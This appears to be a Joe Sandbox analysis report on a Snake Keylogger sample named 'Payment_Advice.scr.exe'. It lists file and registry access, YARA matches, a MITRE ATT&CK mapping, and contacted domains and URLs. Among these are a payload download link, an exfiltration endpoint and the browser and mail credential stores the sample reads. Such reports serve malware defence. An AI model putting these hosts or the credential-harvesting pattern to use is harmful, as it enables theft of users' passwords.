Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Temp\hadvices.scr VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Temp\hadvices.scr VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Temp\hadvices.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Code function: 2_2_00405594 GetVersionExW,GetVersionExW,

2_2_00405594

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3360095396.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Temp\hadvices.scr	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Temp\hadvices.scr	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Temp\hadvices.scr	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Temp\hadvices.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3360095396.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	21 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment_Advice.scr.exe	58%	Virustotal		Browse
Payment_Advice.scr.exe	53%	ReversingLabs	Win32.Trojan.Leonem

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\hadvices.scr	100%	Joe Sandbox ML
C:\Windows\Temp\hadvices.scr	71%	ReversingLabs	Win32.Trojan.Negasteal
C:\Windows\Temp\hadvices.scr	35%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	2%	Virustotal	Browse
mail.qoldenfrontier.com	0%	Virustotal	Browse
scratchdreams.tk	17%	Virustotal	Browse
advising-receipts.com	13%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://adviF.0	0%	Avira URL Cloud	safe
https://advising-receipts.com	0%	Avira URL Cloud	safe
https://advising-receipts.com/hsbc/hadvices.scr	0%	Avira URL Cloud	safe
http://advising-receipts.com	0%	Avira URL Cloud	safe
http://mail.qoldenfrontier.com	100%	Avira URL Cloud	malware
https://reallyfreegeoip.orgp	0%	Avira URL Cloud	safe
https://advising-receipts.com	10%	Virustotal		Browse
https://reallyfreegeoip.org/xml/149.18.24.96	0%	Avira URL Cloud	safe
http://advising-receipts.com	13%	Virustotal		Browse
https://reallyfreegeoip.org/xml/149.18.24.96$	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
https://advising-receipts.com/hsbc/Payment_Advice.pdf	0%	Avira URL Cloud	safe
http://mail.qoldenfrontier.com	0%	Virustotal		Browse
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	16%	Virustotal		Browse
https://scratchdreams.tk	16%	Virustotal		Browse
http://scratchdreams.tk	17%	Virustotal		Browse
https://advising-receipts.com/hsbc/Payment_Advice.pdf	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	2%, Virustotal, Browse	unknown
mail.qoldenfrontier.com	108.167.142.65	true	true	0%, Virustotal, Browse	unknown
scratchdreams.tk	172.67.169.18	true	false	17%, Virustotal, Browse	unknown
advising-receipts.com	104.21.27.63	true	true	13%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://advising-receipts.com/hsbc/hadvices.scr	true	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/149.18.24.96	false	Avira URL Cloud: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://advising-receipts.com/hsbc/Payment_Advice.pdf	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2381622026.000002169006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2327709883.0000021680233000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2327709883.0000021680233000.00000004.00000800.00020000.00000000.sdmp	false		high
http://advising-receipts.com	powershell.exe, 00000004.00000002.2327709883.00000216815DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2327709883.0000021681AD4000.00000004.00000800.00020000.00000000.sdmp	false	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000004.00000002.2327709883.0000021680C33000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://adviF.0	wscript.exe, 00000003.00000002.2417316858.000001FA96795000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000008.00000003.2178173625.0000024E19FB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	false		high
http://crl.ver)	svchost.exe, 00000008.00000002.3360378918.0000024E1A200000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://checkip.dyndns.org	hadvices.scr, 00000010.00000002.3360095396.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2327709883.0000021680233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://advising-receipts.com	powershell.exe, 00000004.00000002.2327709883.00000216817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2327709883.0000021680C33000.00000004.00000800.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mail.qoldenfrontier.com	hadvices.scr, 00000010.00000002.3360095396.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://crl.m	hadvices.scr, 00000010.00000002.3366127698.0000000006070000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod1C:	edb.log.8.dr	false		high
https://reallyfreegeoip.orgp	hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/149.18.24.96$	hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	hadvices.scr, 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2381622026.000002169006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://scratchdreams.tk	hadvices.scr, 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.2327709883.0000021680001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.2327709883.0000021680001000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://scratchdreams.tk	hadvices.scr, 00000010.00000002.3360095396.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	hadvices.scr, 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.210.0.138	unknown	United States	16625	AKAMAI-ASUS	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.67.169.18	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false
108.167.142.65	mail.qoldenfrontier.com	United States	46606	UNIFIEDLAYER-AS-1US	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.27.63	advising-receipts.com	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1434635
Start date and time:	2024-05-01 15:16:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_Advice.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@28/55@9/7
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 96% Number of executed functions: 157 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
